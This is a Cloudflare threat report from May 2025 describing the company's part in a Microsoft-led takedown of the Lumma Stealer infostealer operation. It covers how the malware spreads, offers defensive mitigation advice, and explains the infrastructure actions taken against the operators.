Cloudflare participates in global operation to disrupt Lumma Stealer
Threat report - May 21, 2025
Overview
Cloudflare’s Cloudforce One and Trust and Safety team participated in a coordinated disruption effort targeting the Lumma Stealer malware operation. Lumma Stealer (also known as LummaC2) is part of a broader class of information-stealing malware that poses a serious threat to both individuals and organizations. By exfiltrating credentials, cryptocurrency wallets, cookies, and other sensitive data from infected machines, Lumma facilitates a wide range of downstream criminal activity, including financial fraud, identity theft, and enterprise breaches that can lead to ransomware. Disrupting this ecosystem is critical to protecting users, undermining the cybercrime economy, and preventing further harm.
Lumma Stealer attempted to abuse numerous service providers’ infrastructure, including Cloudflare, to support their malware operations. Cloudflare detected Lumma Stealer’s abuse and participated in a Microsoft-led disruption effort. As part of this effort, Microsoft collaborated with other private industry partners, both those directly impacted and those providing intelligence and technical support, along with the U.S. Department of Justice, Europol’s European Cybercrime Center (EC3), and Japan’s Cybercrime Control Center (JC3).
Executive summary
Lumma Stealer is Malware-as-a-Service offering that allows criminals to rent access to an administrative panel, where they can retrieve stolen data and generate customized builds of the malware payload for distribution to victims worldwide.
Like most other information stealing malware, Lumma Stealer is spread primarily through social engineering campaigns that lure targets into following instructions that result in the download and execution of malware.
The Lumma Stealer disruption effort denies the Lumma operators access to their control panel, marketplace of stolen data, and the Internet infrastructure used to facilitate the collection and management of that data. These actions impose operational and financial costs on both the Lumma operators and their customers, forcing them to rebuild their services on alternative infrastructure.
What is Lumma Stealer?
Lumma Stealer was first observed posting to the Russian language crime forums known as Exploit and XSS in February 2023. Most of Lumma’s business is now conducted on Telegram where criminals can purchase access to the admin panel using a variety of cryptocurrencies. Lumma’s original sales thread, as shown below, appeared on crime forums and was linked to a website that has been offline for some time prior to the current disruption effort.
Exploit member Shamel posted the original sales thread for LummaC2
The stolen credentials collected by Lumma’s operators, called “logs”, were parsed and indexed for Lumma’s own marketplace where criminals could buy credits with cryptocurrency and search for lucrative credentials. Lumma’s logs were also collected by other criminals who sold access to their collections on Telegram.
The Lumma Market website allows users to search for and purchase stolen credentials
Methods of infection
Recent information stealer campaigns typically involve social engineering rather than the exploitation of a vulnerability. Microsoft and other security researchers have documented a technique known as ClickFix. In this approach, users who visit compromised websites or encounter malicious ads are presented with a deceptive modal popup, warning them of urgent issues with their computer. The popup instructs users to execute keyboard shortcuts that launch a remote PowerShell script, which then downloads and runs a payload, such as LummaC2.
Lumma’s payloads are typically spread using pay-per-install (PPI) networks or traffic sellers that deliver installs as a service. The price typically depends on the location of the install and if the target device is a mobile phone or a desktop computer. Lumma and many other information stealers are often bundled with cracked versions of popular commercial software, targeting users looking to avoid paying for legitimate licenses. To make matters worse, the operators behind LummaC2 invest significant effort into ensuring their malware evades detection by popular antivirus solutions.
Mitigating Lumma Stealer activity
Properly defending against Lumma Stealer involves a layered security approach, since it’s a fast-evolving infostealer often delivered via malvertising, phishing, or compromised software. Enterprise defenders should carefully restrict access to new domains, as newly registered domains (NRDs) are a common tactic extensively used by LummaC2. Users outside of an enterprise may consider limiting or preventing the execution of PowerShell and other scripts if it is not required. Enterprise defenders should also consider the following:
Endpoint protection and hardening
Do not permit users to download executable files from untrusted websites
Do not permit users to download or execute scripts or Microsoft Office macros that were downloaded from the Internet, are unsigned, or that are not explicitly allowed by policy
Use reputable endpoint detection and response (EDR) tools that can detect suspicious behaviors, like credential scraping or unauthorized file access
Application allowlisting to prevent unknown executables (including downloaded payloads) from running
Disable PowerShell for non-administrative users, or use Constrained Language Mode to reduce abuse risk
Browser and credential hygiene
Avoid saving passwords in browsers—use a dedicated password manager instead.
Clear autofill data and browser caches regularly
Disable autofill for sensitive information like names, phone numbers, or addresses, especially on corporate machines
Patch and update regularly
Keep browsers, operating systems, and all software up to date to reduce exploitability via known vulnerabilities
DNS and network filtering
Use secure DNS filtering and threat intelligence-based blocklists to prevent connections to NRDs, known C2 servers, malware delivery domains, and Telegram APIs used for data exfiltration
Email and web filtering
Implement malicious attachment and link detection in email gateways
Deploy browser isolation or sandboxing to reduce the risk of drive-by downloads from malvertising
User training
Educate users about malvertising, fake software installers, and browser scareware tactics like ClickFix, which are common delivery mechanisms
Warn users not to run PowerShell scripts or click on scare popups instructing them to “fix” computer issues
Detection and threat hunting
Monitor for unusual outbound connections (especially to Telegram or rare domains)
Monitor for unauthorized credential access from browsers
Monitor for suspicious PowerShell or process spawning activity (e.g., explorer.exe spawning powershell.exe)
Coordinating our Lumma Stealer response
Cloudflare’s services protect its customers' Internet properties from DDoS and other attacks. In order for Cloudflare to provide this protection, Cloudflare’s customers’ origin IP addresses are not necessarily visible to website visitors. Lumma Stealer abused that feature of Cloudflare’s infrastructure to hide the origin IP address of the server that criminals used to collect files and credentials stolen by malware. Cloudflare’s Trust and Safety team repeatedly flagged domains used by the criminals and suspended their accounts. In February 2025, Lumma’s malware was observed bypassing Cloudflare’s interstitial warning page, which is one countermeasure that Cloudflare employs to disrupt malicious actors. In response, Cloudflare added the Turnstile service to the interstitial warning page, so the malware could not bypass it.
The Cloudflare warning interstitial now has Turnstile verification
Cloudflare’s role in the disruption included placing a new, Turnstile-enabled interstitial warning page in front of the malicious actors’ command and control server domains and Lumma’s Marketplace domains, as well as taking action against the accounts that were used to configure the domains. Normally, if a criminal actor attempts to abuse Cloudflare’s name services but not Cloudflare’s registry services, they can recover control of their domains by changing the Start of Authority at the registrar. Microsoft coordinated the takedown of Lumma’s domains with multiple relevant registries in order to ensure that the criminals could not simply change the name servers and recover their control.
To learn more about getting access to the list of Lumma Stealer indicators along with additional actionable context, refer to our Threat Events platform, available to Cloudforce One customers.
